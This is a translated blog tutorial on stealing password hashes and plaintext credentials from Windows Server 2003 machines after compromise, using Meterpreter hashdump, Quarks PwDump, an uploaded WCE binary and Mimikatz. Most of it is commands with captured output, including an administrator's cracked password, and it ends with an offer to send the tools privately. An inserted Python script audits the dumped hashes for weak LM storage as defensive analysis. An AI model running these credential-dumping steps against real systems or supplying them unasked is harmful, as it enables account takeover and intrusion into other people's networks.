Several ways to capture password hashes from a Windows system

Preface

All of the target systems in this article are Windows Server 2003 ("03") machines.

Grabbing passwords with hashdump

Extract the hash values from the target machine and crack them to obtain the account passwords. The user name and password hash of every account on the computer (or of every account in the domain, if the machine is a domain controller) are stored in the SAM file. While the system is running this file is locked, and accessing it requires a SYSTEM-level account, so you must escalate privileges before using this command. Enter the hashdump command at the Meterpreter prompt to export the hashes from the target's SAM database:

meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1007:4274ebc980bc50aed4a6c053eb6761b1:326f3aae7bd9312f6b32afafec858d53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:ae694413fb708add0aa8b1b47358ce92:::

Another module, smart_hashdump, is more powerful and can export the hashes of all users in the domain. Its workflow is as follows:

 - Check the privileges of the Meterpreter session and the target's operating system type
 - Check whether the target is a domain controller
 - First try to read the hashes from the registry; if that fails, try injecting into the LSASS process

The grabbed hashes can be cracked by brute force or with rainbow tables, for example via http://www.cmd5.com/
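The hashdump output above is in pwdump format (user:RID:LM hash:NT hash:::), and a defender can read a lot from it without cracking anything: whether LM hashes are still being stored, whether a password is at most 7 characters (the second LM half is then the hash of an empty block), and whether a password is blank. The script below is an added example, not code from the original post; it audits the exact lines shown above, and the two sentinel constants are the well-known LM/NT hashes of an empty password (both also appear in the page's output for the Guest account).

```python
"""Audit hashdump/pwdump-format lines for weak credential-storage settings.

Added example, not part of the original post. Parses user:rid:lm:nt:::
lines and reports conditions a defender cares about.
"""

# LM hash of an empty 7-character half: marks "no LM hash stored" when doubled,
# and "password <= 7 characters" when it appears only as the second half.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
# NT hash of an empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the hashdump output shown in the post.
SAMPLE_HASHDUMP = """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1007:4274ebc980bc50aed4a6c053eb6761b1:326f3aae7bd9312f6b32afafec858d53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:ae694413fb708add0aa8b1b47358ce92:::
"""


def parse_pwdump_line(line):
    """Split one pwdump line into (user, rid, lm, nt); return None for junk lines."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
        return None
    return user, int(rid), lm, nt


def audit_account(user, rid, lm, nt):
    """Return the list of findings for one account (empty list = nothing notable)."""
    findings = []
    if nt == EMPTY_NT:
        findings.append("blank password")
    if lm == EMPTY_LM:
        if nt != EMPTY_NT:
            findings.append("LM hash not stored (LM disabled or password >= 15 chars)")
    else:
        findings.append("LM hash stored (weak: case-insensitive, crackable offline)")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password is at most 7 characters (second LM half is empty)")
    if rid == 500 and lm != EMPTY_LM:
        findings.append("built-in Administrator (RID 500) has an LM hash")
    return findings


def audit_hashdump(text):
    """Audit every parsable line; returns {user: [findings]} for accounts with findings."""
    report = {}
    for line in text.splitlines():
        parsed = parse_pwdump_line(line)
        if parsed is None:
            continue
        findings = audit_account(*parsed)
        if findings:
            report[parsed[0]] = findings
    return report


if __name__ == "__main__":
    for account, notes in audit_hashdump(SAMPLE_HASHDUMP).items():
        print(f"{account}:")
        for note in notes:
            print(f"  - {note}")
```

On the page's own data this reports that Administrator's password is stored as an LM hash and is at most 7 characters long (which the wdigest output later confirms: 123456), that Guest has a blank password, and that SUPPORT_388945a0 has no LM hash stored. The fix on the server side is the NoLMHash policy (Network security: Do not store LAN Manager hash value on next password change) together with a minimum password length above 14.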

Grabbing passwords with Quarks PwDump

Quarks PwDump is a tool for exporting system credential information in the Win32 environment. Supported operating systems include XP, 2003, Windows 7, Windows 8, 2008 and others. In Windows, passwords are stored in the encrypted SAM file, and once an account has logged on, both the ciphertext and the plaintext of its password are held in system memory. This memory cannot be read under normal conditions, but Quarks PwDump can read it.

Run Quarks PwDump.exe directly. Its options are:
-dhl: dump local hashes
-dhdc: dump the domain controller hashes held in memory
-dhd: dump domain controller hashes; an NTDS file must be specified
-db: dump BitLocker information; an NTDS file must be specified
-nt: dump the NTDS file
-hist: dump history information (optional)
-t: output type (optional); the default is John format
-o: write the output to a local file

Here we use the tool to grab the hashes and export them. The following command dumps the local hashes to 1.txt in the current directory:

QuarksPwDump.exe --dump-hash-local --output 1.txt


Grabbing passwords with Windows Credentials Editor

Windows Credentials Editor (WCE) is a powerful intranet penetration tool for the Windows platform. It can enumerate logon sessions and add, change and delete the associated credentials (such as LM/NT hashes). These functions are useful in intranet penetration, for example to perform pass-the-hash on Windows, or to obtain NT/LM hashes from memory (including those from interactive logons, services and Remote Desktop connections) for further attacks. It is also very small, which makes it an indispensable tool for intranet penetration. It must, however, be run with administrator privileges, and attention must be paid to anti-virus software.
First use the upload command to upload wce.exe to the C drive of the target host, then run wce -w in the target's shell; the system administrator's password is extracted successfully.

meterpreter > upload /root/wce.exe C:\Documents and Settings\Administrator\桌面\wce_v1_3beta>

By default WCE behaves as if run with -l and reads data in the format username:domain:lm:ntlm (this reads the logged-on credentials from memory, not the contents of the SAM database). The default reading method first tries a safe approach and, if that fails, falls back to an unsafe one, which can damage the system; it is therefore recommended to use -f to force the safe method. The -g parameter computes hashes for a given password, that is, it applies the same algorithm the system uses to produce the stored ciphertext. The -c parameter specifies the session in which to run cmd, and -v displays verbose information so that the LUID can be seen. The most important parameter is -w, which shows the plaintext passwords of users who have logged on.

-c: specify the session in which to run cmd
-v: display verbose information
-w: show the plaintext passwords of logged-on users
-l: read logged-on credentials from memory
-f: force the safe reading method
-g: compute the hashes for a password


Grabbing passwords with Mimikatz

Mimikatz is a lightweight debugger written by the French researcher Benjamin Delpy (@gentilkiwi). As a post-exploitation tool it lets security testers grab system passwords with ease. It can also use captured Kerberos logon credentials to bypass the RestrictedAdmin mode of Remote Desktop (RDP) on Windows 8 and Windows Server 2012. After the initial compromise, an attacker usually wants to gain a firmer foothold in the machine or network, which normally requires a set of complementary tools; Mimikatz is an attempt to bundle these useful tasks together. Note that it cannot be used on Windows 2000 or Windows XP. Metasploit integrates it as a Meterpreter extension, so it can be used without uploading the binary to the target host. Mimikatz must be run with administrator privileges. From here on we assume that a Meterpreter shell on the target has already been obtained through the preceding stages of the penetration.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

After obtaining SYSTEM privileges, first check the target's architecture. Mimikatz supports both 32-bit and 64-bit Windows, but if the server runs a 64-bit operating system and Mimikatz is loaded directly, Meterpreter loads the 32-bit version into memory by default, and many functions then fail. On a 64-bit system you must therefore list the processes and migrate into a 64-bit process before loading Mimikatz to view plaintext passwords. A 32-bit system has no such restriction. Enter the sysinfo command:

meterpreter > sysinfo
Computer        : WWW
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Load Mimikatz directly and view the help:

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.
    

The mimikatz_command option gives access to all of Mimikatz's functions. Requesting a module that does not exist returns the complete list of available modules:

meterpreter > mimikatz_command -f a::
Module : 'a' introuvable

Modules disponibles : 
            	- Standard
      crypto	- Cryptographie et certificats
        hash	- Hash
      system	- Gestion système
     process	- Manipulation des processus
      thread	- Manipulation des threads
     service	- Manipulation des services
   privilege	- Manipulation des privilèges
      handle	- Manipulation des handles
 impersonate	- Manipulation tokens d'accès
     winmine	- Manipulation du démineur
 minesweeper	- Manipulation du démineur 7
       nogpo	- Anti-gpo et patchs divers
     samdump	- Dump de SAM
      inject	- Injecteur de librairies
          ts	- Terminal Server
      divers	- Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
    sekurlsa	- Dump des sessions courantes par providers LSASS
         efs	- Manipulations EFS

The "::" syntax requests the commands available in a given module; after naming a module, "::" with no command shows that module's help. For example, the commands available in the hash module are lm and ntlm:

meterpreter > mimikatz_command -f hash::
Module : 'hash' identifié, mais commande '' introuvable

Description du module : Hash
          lm	- Hash LanManager (LM) d'une chaîne de caractères
        ntlm	- Hash NT LanManger (NTLM) d'une chaîne de caractères

Once the general usage of Mimikatz is understood, we can use either Metasploit's built-in commands or Mimikatz's own commands to export hashes and plaintext credentials from the target. Enter the msv command to grab the system hashes:

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;202037  NTLM       WWW           Administrator    lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    n.s. (Credentials KO)
0;53201   NTLM                                      n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     WWW$             n.s. (Credentials KO)

Enter the kerberos command to grab the system's Kerberos tickets:

meterpreter > kerberos 
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;53201   NTLM                                      
0;999     NTLM       WORKGROUP     WWW$             
0;202037  NTLM       WWW           Administrator    123456

Enter the wdigest command to obtain the system account information:

meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;53201   NTLM                                      
0;999     NTLM       WORKGROUP     WWW$             
0;202037  NTLM       WWW           Administrator    123456

Then enter mimikatz_command -f samdump:: to view the available commands of the samdump module, and mimikatz_command -f samdump::hashes to grab the hashes:

mimikatz_command -f samdump:: 

Besides grabbing hashes, Mimikatz has many other functions, such as the handle module, listing and killing processes, and impersonating user tokens.

Need the tools? Look here

Another simple and fulfilling day! Anyone who needs the tools can add me or message me privately.
QQ: 3075999532
WeChat official account: (QR code image)

Source: blog.csdn.net/p_utao/article/details/108504346